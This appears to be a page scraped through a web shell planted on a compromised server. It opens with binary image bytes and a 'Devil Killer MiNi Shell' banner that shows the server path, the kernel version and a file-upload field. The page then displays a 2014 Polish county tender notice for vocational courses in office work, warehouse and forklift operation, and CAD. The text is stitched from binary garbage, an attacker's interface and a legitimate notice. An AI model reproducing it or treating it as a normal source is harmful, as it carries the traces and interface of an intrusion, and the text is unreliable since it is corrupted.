JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140725/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140725/249234-N-2014.html

<p class="kh_header"><b>Myszków: Zorganizowanie i przeprowadzenie szkoleń zawodowych i kursu komputerowego dla uczniów ponadgimnazjalnych szkół Powiatu Myszkowskiego</b><br>
<b>Numer ogłoszenia: 249234 - 2014; data zamieszczenia: 25.07.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Myszkowski reprezentowany przez Zarząd Powiatu w Myszkowie , ul. Pułaskiego 6, 42-300 Myszków, woj. śląskie, tel. 034 3159100, faks 034 3159160.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zorganizowanie i przeprowadzenie szkoleń zawodowych i kursu komputerowego dla uczniów ponadgimnazjalnych szkół Powiatu Myszkowskiego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie usług szkoleniowych w zakresie kursu obsługi biura i sekretariatu dla maksymalnej liczby 15 uczniów, kursu magazyniera z obsługą wózków jezdniowych i bezpieczną wymianą butli gazowej dla maksymalnej liczby 16 uczniów oraz kursu obsługi licencjonowanego oprogramowania Komputerowego Wspomagania Projektowania (CAD) dla maksymalnej liczby 5 uczniów ponadgimnazjalnych szkół Powiatu Myszkowskiego, uczestników Projektu  Mam zawód - mam pracę w regionie współfinansowany przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Priorytetu IX Działania 9.2 Podniesienie atrakcyjności i jakości szkolnictwa zawodowego.

1. SZCZEGÓŁOWY OPIS PRZEDMIOTU ZAMÓWIENIA 
1.1.Zorganizowanie i przeprowadzenie kursu pn.  Obsługa biura i sekretariatu dla maksymalnej liczby 12 uczniów.

1)	Cel szkolenia/kursu: teoretyczne i praktyczne przygotowanie uczestników szkolenia do prowadzenia biura i sekretariatu.
2)	Zakres szkolenia: kurs powinien obejmować podstawowe aspekty pracy w biurze i sekretariacie i winien zakończyć się sprawdzianem wiedzy i umiejętności.
3)	Wymiar godzin szkolenia/kursu - 60 godzin.
4)	Plan realizacji szkolenia/kursu - Program szkolenia określający szczegółową tematykę powinien obejmować co najmniej niżej wymienione bloki tematyczne:
Organizacja pracy sekretariatu/biura:
a. organizacja stanowiska pracy;
b. techniki przepływu informacji w zarządzaniu biurem;
c. efektywne zarządzanie czasem;
d.	standardowe procedury biurowe a specyfika działalności firmy;
e.	nowoczesna technika i technologia biurowa;
f.	korespondencja - tworzenie dokumentów biurowych;
g.	tradycyjne i nowoczesne sposoby utrwalania i przechowywania informacji.
Obsługa komputera:
a.	adaptacja bezwzrokowej metody pisania do klawiatury komputera;
b.	ćwiczenie biegłości i jakości pisania;
c.	rozmieszczanie tekstów w różnych układach
d.	technika sporządzania dłuższych opracowań tekstowych;
e.	korespondencja- pisma zaadresowane i zatytułowane, korespondencja seryjna;
f.	komputerowe wspomaganie prac biurowych;
g.	przygotowanie prezentacji.
h.	Usługi w sieci Internet
 Operacje fakturowania komputerowego:
a.	faktura VAT
b.	zasady dokumentowania i ewidencjonowania, wystawiania i przechowywania faktur oraz not korygujących;
c.	stawka VAT, a symbole PKWiU;
d.	duplikaty;
e.	podpisy i upoważnienie;
f.	ewidencjonowanie faktur;
g.	błędy formalne faktur.
 Obsługa technicznych środków biurowych:
a.	zasady działania urządzeń biurowych;
b.	posługiwanie się min. telefonem, faksem, kserokopiarką, niszczarką, dyktafonem
 Aspekty psychologiczne
a.	komunikacja
b.	asertywność
c.	współpraca w grupie i z przełożonymi

Program może być uzupełniony lub poszerzony o zagadnienia, które w ocenie Wykonawcy winny być zrealizowane celem odpowiedniego przygotowania uczestników szkolenia do wykonywania pracy w charakterze obsługi biura i sekretariatu. 
Po podpisaniu umowy i otrzymaniu imiennego wykazu uczestników wykonawca zobowiązany jest w ciągu 5 dni roboczych dostarczyć Zamawiającemu do harmonogram kursu. Kurs będzie realizowany zgodnie z przyjętym  harmonogramem
5)	Materiały szkoleniowe - wykonawca zapewni każdemu z uczestników materiały szkoleniowe związane bezpośrednio z zakresem szkolenia w postaci książek lub skryptów (w formie drukowanej) i materiały piśmiennicze (co najmniej 1 zeszyt A-4 w twardej oprawie, długopis oraz teczka wiązana). Po zakończeniu szkolenia w/w materiały przejdą na własność uczestników .
6)	Uzyskane uprawnienia i dokumenty - Każdy uczestnik kursu otrzyma  zaświadczenie o ukończeniu kursu w zakresie obsługi biura i sekretariatu wraz z suplementem na wzorze MEN (zgodnie z Rozporządzeniem Ministra Edukacji Narodowej, z dnia 11 stycznia 2012r. w sprawie kształcenia ustawicznego w formach pozaszkolnych - Dz. U. z 2012r, Nr 34, poz. 186 ze zmianami).
7) Termin i miejsce przeprowadzenia kursu: Wymaga się aby kurs został zrealizowany w nieodpłatnie udostępnionej przez Zamawiającego sali wykładowej na terenie Zespołu Szkół Nr 1 im. E. Kwiatkowskiego w Myszkowie lub na terenie innej szkoły ponadgimnazjalnej biorącej udział w Projekcie. Zajęcia winny odbywać się w godzinach nie pokrywających się z zajęciami szkolnymi w wymiarze nie przekraczającym 4 godzin dziennie.  W dni wolne od nauki szkolnej  lub w okresie wakacji zajęcia mogą odbywać się codziennie w wymiarze nie przekraczającym 8 godzin dziennie w godzinach od 8:00  do godziny 18:00 (z pominięciem niedziel i świąt). Termin realizacji  - 2 miesiące od dnia podpisania umowy.

1.2 Zorganizowanie i przeprowadzenie szkolenia zawodowego w zakresie kursu magazyniera z obsługą wózków jezdniowych i bezpieczną wymiana butli gazowej wraz z egzaminem przed komisją Urzędu Dozoru Technicznego dla 16  uczniów.

1.	Cel szkolenia - podniesienie  kwalifikacji zawodowych poprzez ukończenie kursu magazyniera, kierowcy/operatora wózka jezdniowego z bezpieczną wymianą butli gazowej, a po zdaniu egzaminu zdobycie uprawnień kierowcy/operatora wózka jezdniowego i uprawnień do bezpiecznej wymiany butli gazowej, wydawanych przez Urząd Dozoru Technicznego (UDT).  

2.	Zakres szkolenia - szkolenie powinno odbywać się zgodnie z obowiązującymi w przedmiocie zamówienia przepisami prawa. Kurs kierowcy/operatora wózków jezdniowych z bezpieczną wymianą butli gazowych powinien zakończyć się sprawdzeniem zdobytej wiedzy i umiejętności. Wykonawca zorganizuje i opłaci uczestnikom szkolenia egzamin przed Komisją UDT a koszty egzaminu uwzględni w ofercie.

3.	Wymiar godzin szkolenia - 97 godzin w tym 67 godzinny kurs kierowcy/operatora wózków jezdniowych z bezpieczną wymianą butli gazowych. (UWAGA - jeżeli wykonawca posiada zatwierdzony przez UDT inny niż 67 godzinny program szkolenia kierowców/operatorów wózków jezdniowych z bezpieczną wymianą butli gazowej - wówczas wymiar godzin przedmiotowego szkolenia winien być zgodny z posiadanym programem). 

4.	Plan realizacji szkolenia -   Program szkolenia określający szczegółową tematykę w zakresie kursu kierowcy/operatora wózków jezdniowych z bezpieczną wymianą butli gazowej - wydany i/lub zatwierdzony przez UDT. Zapis oznacza, że wykonawca może szkolić na podstawie zakupionego programu opracowanego przez UDT lub na podstawie własnego programu zatwierdzonego przez UDT. Program szkolenia w zakresie kursu magazyniera powinien być opracowany w oparciu o Krajowe Standardy Kwalifikacji Zawodowych MPiPS w obrębie zawodu Magazynier i powinien zawierać co najmniej zagadnienia z zakresu:
a.	- Przepisów bhp i p .poż w magazynie (hurtowni),
b.	- Odbioru towarów.
c.	- Zasad poprawnego przechowywania towarów,
d.	- Wydawania towarów,
e.	- Obsługi programu  komputerowego do prowadzenia gospodarki magazynowej np. programu Subiekt, Magazyn Multi lub inny program równoważny, 
f.	- Dokumentów magazynowych - sporządzania i obiegu dokumentów

Program może być uzupełniony lub poszerzony o zagadnienia, które w ocenie Wykonawcy winny być zrealizowane celem odpowiedniego przygotowania uczestników szkolenia do wykonywania pracy w charakterze magazyniera. Po podpisaniu umowy i otrzymaniu imiennego wykazu uczestników,  wykonawca zobowiązany jest w ciągu 5 dni roboczych dostarczyć Zamawiającemu do Biura Projektu harmonogram kursu z uwzględnieniem poszczególnych modułów szkoleniowych. Kurs realizowany będzie zgodnie z przyjętym harmonogramem.

5.	Materiały szkoleniowe - wykonawca zapewni każdemu z uczestników materiały szkoleniowe związane bezpośrednio z zakresem szkolenia w postaci książek lub skryptów (w formie drukowanej ), materiały piśmiennicze (co najmniej 1 zeszyt A-4 w twardej oprawie, długopis oraz teczka wiązana). Po zakończeniu szkolenia w/w materiały przejdą na własność uczestników.

6.	Środki ochrony osobistej - wykonawca na czas szkolenia praktycznego zapewni uczestnikom środki ochrony osobistej kierowcy/operatora wózka jezdniowego, zgodnie z obowiązującymi w tym zakresie przepisami BHP.

7.	Uzyskane uprawnienia i dokumenty - Każdy uczestnik kursu otrzyma  zaświadczenie o ukończeniu kursu magazyniera z obsługą wózka jezdniowego i bezpieczną wymianą butli gazowej (zaświadczenie na wzorze MEN zgodnie z  Rozporządzeniem Ministra Edukacji Narodowej, z dnia 11 stycznia 2012r. w sprawie kształcenia ustawicznego w formach pozaszkolnych (Dz. U. z 2012r, Nr 34, poz. 186 ze zmianami) wraz z suplementem a po uzyskaniu pozytywnego wyniku egzaminu  - zaświadczenie kwalifikacyjne o zdobytych uprawnieniach kierowcy/operatora wózka jezdniowego i zaświadczenie o uprawnieniach do bezpiecznej wymiany butli gazowej wydawane przez UDT. 

8.	Termin i miejsce przeprowadzenia szkolenia: Kursy powinny zostać zrealizowane na terenie Powiatu Myszkowskiego. Wymaga się aby zajęcia w zakresie kursu magazyniera zostały zrealizowane w nieodpłatnie udostępnionych przez Zamawiającego salach wykładowych znajdujących się na terenie Zespołu Szkół Nr 2. im. H. Kołłątaja w Myszkowie lub na terenie innej szkoły ponadgimnazjalnej biorącej udział w Projekcie. Zajęcia teoretyczne i praktyczne w wymiarze nie przekraczającym 4 godzin dziennie winny odbywać się po zajęciach szkolnych, nie dłużej niż do godziny 20:00. W dniach wolnych od nauki szkolnej oraz w okresie wakacji zajęcia w wymiarze nie przekraczającym 8 godzin dziennie mogą odbywać się w godzinach od 8:00 do 18:00(z pominięciem niedziel i świąt). Termin realizacji  - 2 miesiące od dnia zawarcia umowy.

1.3 Zorganizowanie i przeprowadzenie kursu obsługi programu Komputerowego Wspomagania Projektowania - CAD  dla maksymalnej liczby 5 uczniów

1. Cel szkolenia/kursu: teoretyczne i praktyczne przygotowanie uczestników kursu do obsługi programu Komputerowego Wspomagania Projektowania typu CAD oraz umiejętności wykorzystania programu typu CAD.
 2. Zakres szkolenia: kurs powinien obejmować podstawy obsługi programu typu CAD powinien zakończyć się sprawdzianem wiedzy i umiejętności. 
 3. Wymiar godzin kursu - 60 godzin
 4. Program kursu powinien obejmować:
a.	Wprowadzenie do środowiska pracy;
b.	Wyświetlanie rysunku;
c.	Ustawienia rysunku;
d.	Współrzędne i podstawowe narzędzia rysunkowe;
e.	Tworzenie geometrii dwuwymiarowej;
f.	Modyfikowanie geometrii dwuwymiarowej;
g.	Zarządzanie cechami obiektów;
h.	Techniki konstrukcyjne;
i.	Obiekty tekstowe i ich style;
j.	Wprowadzenie do wymiarowania;
k.	Kreskowanie;
l.	Wprowadzenie do wydruku.

Program może być uzupełniony lub poszerzony o zagadnienia, które w ocenie Wykonawcy winny być zrealizowane celem odpowiedniego przygotowania uczestników szkolenia do wykonywania pracy w charakterze obsługi biura i sekretariatu. 
Po podpisaniu umowy i otrzymaniu imiennego wykazu uczestników wykonawca zobowiązany jest w ciągu 5 dni roboczych dostarczyć Zamawiającemu do harmonogram kursu. Kurs będzie realizowany zgodnie z przyjętym  harmonogramem
5.Materiały szkoleniowe - wykonawca zapewni każdemu uczestnikowi materiały szkoleniowe związane bezpośrednio z zakresem szkolenia w postaci książek lub skryptów (w formie drukowanej lub elektronicznej), materiały piśmiennicze (co najmniej 1 zeszyt formatu A-4 w twardej oprawie, długopis oraz teczka wiązana). Po zakończeniu kursu w/w materiały przejdą na własność uczestników.
6. Uzyskane uprawnienia i dokumenty - uczestnik uzyska zaświadczenie o ukończenia kursu na wzorze MEN, (zgodnie z Rozporządzeniem Ministra Edukacji Narodowej, z dnia 11 stycznia 2012r. w sprawie kształcenia ustawicznego w formach pozaszkolnych) wraz z suplementem. 
7. Termin i miejsce przeprowadzenia kursu: Zamawiający udostępni nieodpłatnie wykonawcy salę wykładową na terenie Zespołu Szkół nr 2 im H. Kołłątaja w Myszkowie lub na terenie innej szkoły ponadgimnazjalnej biorącej udział w Projekcie. Zajęcia winny odbywać się w godzinach nie pokrywających się z zajęciami szkolnymi w wymiarze nie przekraczającym 4 godzin dziennie.  W dni wolne od nauki szkolnej  lub w okresie wakacji zajęcia mogą odbywać się codziennie w wymiarze nie przekraczającym 6 godzin dziennie w godzinach od 8:00  do godziny 18:00 (z pominięciem niedziel i świąt). Termin realizacji  - 2 miesiące od dnia podpisania umowy..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.53.00.00-8, 80.53.32.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 2.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> NIE DOTYCZY</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wymagany jest aktualny wpis do Rejestru Instytucji  Szkoleniowych na podstawie Ustawy z dnia 20 kwietnia 2004 r. o promocji zatrudnienia i instytucjach rynku pracy - Dz. U. 2008 r. Nr 69, poz. 415 ze zmianami, oraz Rozporządzenia Ministra Edukacji Narodowej, z dnia 11 stycznia 2012r. w sprawie kształcenia ustawicznego w formach pozaszkolnych - Dz. U. z 2012r, Nr 34, poz. 186 ze zmianami,
Ocena spełnienia warunku metoda graniczną spełnia - nie spełnia na podstawie dokumentu potwierdzającego wpis do RIS, jak to opisano w Rozdz. V pkt. C.2) SIWZ. Dopuszcza się wydruk z oficjalnej strony internetowej www.ris.praca.gov.pl dotyczący Wykonawcy - status aktywny.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wymagane jest wykazanie przez wykonawcę zakończonych realizacji szkoleń/kursów:
co najmniej 2 kursów obsługi biura i sekretariatu dla łącznej liczby  uczestników nie mniejszej niż  10 osób 
oraz 
co najmniej 2 kursów magazyniera dla łącznej liczby uczestników nie mniejszej niż  10 osób i co najmniej 2 kursów obsługi wózków widłowych z bezpieczną wymianą butli gazowej dla łącznej liczby  uczestników nie mniejszej niż  10 osób - realizowanych oddzielnie lub w formie szkolenia wielomodułowego.
oraz
co najmniej 2 kursów obsługi komputerowego programu typu CAD  dla łącznej liczby  uczestników nie mniejszej niż 10 osób;
Ocena spełnienia warunku na metodą graniczną spełnia - nie spełnia podstawie Wykazu wykonanych usług - Załącznik nr 6 do SIWZ,  wskazanego w Rozdz. V. pkt. C.3) SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wymagane jest wykazanie, że wykonawca dysponuje lub będzie dysponował odpowiednimi stanowiskami szkoleniowymi i urządzeniami niezbędnymi do realizacji szkoleń/kursów. 
W szczególności wymagane jest wykazanie przez wykonawcę: 

co najmniej 15 stanowisk komputerowych z licencjonowanym oprogramowaniem biurowym (co najmniej oprogramowanie winno zawierać: edytor tekstu, arkusz kalkulacyjny, program do tworzenia prezentacji oraz pocztę elektroniczną), co najmniej 1 aparat telefoniczny  z faksem, co najmniej 1 urządzenie wielofunkcyjne umożliwiające naukę drukowania, powielania i skanowania dokumentów  oraz co najmniej 1 dyktafon - w celu zrealizowania kursu obsługi biura lub sekretariatu, 
co najmniej 1 wózek jezdniowy dopuszczony do eksploatacji przez UDT z napędem gazowym, co najmniej 16 stanowisk komputerowych z licencjonowanym oprogramowaniem magazynowym,  co najmniej 8 kas fiskalnych - w celu zrealizowania kursu magazyniera z obsługą wózków jezdniowych i bezpieczną wymiana butli gazowej,
co najmniej 5 stanowisk komputerowych z licencjonowanym oprogramowaniem typu CAD  np. AutoCAD lub równoważy - w celu zrealizowania kursu obsługi programu typu CAD.

Ocena spełnienia warunku metodą graniczną spełnia - nie spełnia na podstawie Wykazu narzędzi i urządzeń -Załącznik nr 7 do SIWZ, wskazanego w Rozdz. V. pkt. C.4) SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wymagane jest wykazanie, że wykonawca dysponuje lub będzie dysponował wykwalifikowanymi osobami, które będą realizowały zamówienie wraz z oświadczeniem, że osoby te posiadają odpowiednie kompetencje i uprawnienia. 

W szczególności wymagane jest wykazanie dysponowania co najmniej:

1 osobą posiadającą odpowiednie kwalifikacje zawodowe w zakresie prowadzenia biura lub sekretariatu oraz przygotowanie pedagogiczne i 3 letnie doświadczenie w prowadzeniu szkoleń/kursów w zakresie obsługi biura lub sekretariatu, lub wyższe wykształcenie pedagogiczne i uprawnienia nauczyciela przedmiotów zawodowych w zakresie administracji lub funkcjonowania przedsiębiorstwa.
oraz
1 osobą posiadającą odpowiednie kwalifikacje zawodowe oraz przygotowanie pedagogiczne i co najmniej 2 letnie doświadczenie w prowadzeniu zajęć teoretycznych na kursach magazyniera z obsługą wózka jezdniowego lub wyższe wykształcenie pedagogiczne i uprawnienia nauczyciela przedmiotów zawodowych w zakresie gospodarki magazynowej,
oraz
2 osobami posiadającymi uprawnienia do szkolenia praktycznego kierowcy/operatora wózka jezdniowego lub/i bezpiecznej wymiany butli gazowej, w tym co najmniej 1 osobą posiadającą  aktualne uprawnienia UDT kierowcy/operatora wózka jezdniowego i co najmniej 1 osobą posiadającą aktualne uprawnienia UDT do bezpiecznej wymiany butli gazowej
oraz
1 osobą posiadającą odpowiednie kwalifikacje zawodowe i co najmniej 2 letnie doświadczenie w prowadzeniu szkoleń w zakresie obsługi kas fiskalnych, 
oraz
1 osobą posiadającą wykształcenie techniczne lub inżynierskie, przygotowanie pedagogiczne, oraz co najmniej 3 letnie doświadczenie w prowadzeniu szkoleń lub kursów w zakresie obsługi programów komputerowych  typu CAD. 

Ocena spełnienia warunku metodą graniczna spełnia - nie spełnia na podstawie Wykazu osób i Oświadczenia wykonawcy - Załączniki 8 i 8 a do SIWZ, wskazanych w Rozdz. V. pkt. C.5) i C.6) SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia warunków szczegółowych w tym zakresie. Ocena spełnienia warunku metoda graniczna spełnia - nie spełnia zgodnie z Art. 44 ustawy Pzp na podstawie Oświadczenia z Art. 22 Ustawy Pzp - Załącznik nr 2 do SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

